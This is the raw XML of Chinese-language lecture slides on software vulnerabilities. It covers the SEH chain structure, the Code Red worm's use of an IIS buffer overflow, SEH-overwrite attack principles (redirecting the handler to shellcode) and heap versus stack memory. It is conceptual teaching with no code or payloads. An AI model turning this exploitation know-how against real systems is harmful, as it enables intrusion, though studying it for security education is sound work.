      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700338" y="4797425"/>
            <a:ext cx="4103687"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DWORD: Next S.E.H recorder</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700338" y="5373688"/>
            <a:ext cx="41036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DWORD: Exception handler</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链表结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627313" y="1268413"/>
            <a:ext cx="3816350" cy="42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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627313" y="1700213"/>
            <a:ext cx="3816350" cy="42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指向下一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的指针</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627313" y="2133600"/>
            <a:ext cx="38163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异常处理函数句柄</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627313" y="2565400"/>
            <a:ext cx="38163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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2622550" y="2997200"/>
            <a:ext cx="3816350" cy="4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11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2622550" y="3429000"/>
            <a:ext cx="3816350" cy="4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指向下一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的指针</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2622550" y="3860800"/>
            <a:ext cx="3816350" cy="4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异常处理函数句柄</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2622550" y="4292600"/>
            <a:ext cx="3816350" cy="4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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616200" y="4724400"/>
            <a:ext cx="3816350" cy="4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15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616200" y="5145088"/>
            <a:ext cx="3816350" cy="42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指向下一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的指针</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616200" y="5986463"/>
            <a:ext cx="3816350" cy="42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t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616200" y="5565775"/>
            <a:ext cx="3816350" cy="4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异常处理函数句柄</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7019925" y="2152650"/>
            <a:ext cx="1616075" cy="382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异常处理函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接箭头连接符 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6443663" y="2343150"/>
            <a:ext cx="576262" cy="15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矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7031038" y="3898900"/>
            <a:ext cx="1616075" cy="382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异常处理函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接箭头连接符 21"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6454775" y="4089400"/>
            <a:ext cx="576263" cy="15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矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7007225" y="5594350"/>
            <a:ext cx="1614488"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异常处理函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直接箭头连接符 23"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430963" y="5783263"/>
            <a:ext cx="576262" cy="15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肘形连接符 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2622550" y="1911350"/>
            <a:ext cx="4763" cy="1727200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4129614"/>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肘形连接符 27"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1823244" y="4553744"/>
            <a:ext cx="1595437" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2358"/>
              <a:gd name="adj2" fmla="val 2785936"/>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矩形 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1687513"/>
            <a:ext cx="1366837" cy="51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线程控制块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="直接箭头连接符 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835150" y="1844675"/>
            <a:ext cx="781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利用软件漏洞攻击的实例</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81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lgn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蠕虫病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>--------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>红色代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>将网络蠕虫，计算机病毒以及木马程序合为一体，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>开创了网络病毒传播的新路，是划时代的病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="矩形 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2486025" y="6215063"/>
            <a:ext cx="3930650" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用微软</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器的缓冲区溢出漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8197" name="图片 4" descr="untitled.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="3333750"/>
            <a:ext cx="3790950" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>存放在栈中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，利用缓冲区溢出可以覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S.E.H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>精心设计溢出数据，可能把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中异常处理函数的入口地址更改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的起始地址或可以跳转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的跳转指令的地址</a:t>
            </a:r>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堆溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634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堆的概念</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是在程序运行动态分配内存（需要参考用户的反馈）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数申请</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>堆的读，写，释放都是通过堆指针来完成</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用完成后，将堆指针交给释放函数回收这片内存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>增长方向由低地址到高地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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5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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="539750" y="2205038"/>
          <a:ext cx="7993063" cy="2595565"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1872249">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="186495784"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2952393">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="803117565"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3168421">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3773865543"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>堆内存</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>栈内存</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2384537566"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>典型用例</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>动态增长的链表等数据结构</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>函数局部数组</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1363902670"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>申请方式</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>需函数动态申请</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>在程序中直接声明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1201252441"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>释放方式</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>需专门函数释放，如</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>free</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>系统自动回收</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2115537494"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>管理方式</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>由程序员负责申请与释放</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>由系统完成</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1771328611"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>所处位置</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>变化范围很大</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>一般是在</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
                        <a:t>0x0010xxxx</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4293696450"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370795">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>增长方向</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>从内存低地址向高地址排列</a:t>
                      </a:r>
                    </a:p>
